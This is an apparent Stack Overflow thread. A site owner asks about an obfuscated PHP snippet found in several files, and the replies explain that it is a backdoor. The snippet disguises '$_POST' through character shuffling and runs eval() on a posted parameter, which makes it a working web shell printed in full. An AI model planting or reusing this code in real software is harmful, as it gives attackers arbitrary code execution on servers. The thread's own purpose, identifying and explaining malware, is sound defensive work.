# What Does This PHP Code Do?

Tags: php

Recently took over a website and found the following code in a number of files, believe it to be malicious:

```
<?php 
 $qV="stop_";
 $s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
 if(isset(${$s20}['q1134e5'])){eval(${$s20}['q1134e5']);}
?>
```

Any ideas on what it does?

Comment: I'm voting to close this question as off-topic because Stack Overflow is not a code de-obfuscating service.

Comment: This question doesn't belong here, but this code checks the $_POST array for a submitted parameter named `q1134e5` and then executes the PHP code in that parameter.

Comment: (And you are correct in that it is almost certainly a backdoor installed by something malicious.)

Answer (score 2, accepted):

it seems:
- the first line is "_POST";
- the second line check if _POST is valid and than take the parameter 'q1134e5' from the post and execute it.

Read why it is dangerous
http://php.net/manual/en/function.eval.php

Comment: It's a script injection exploit to run arbitrary code posted to the server. I hope OP has clean backups available, because he's going to need to blow away *everything* because this is just the tip of the iceberg.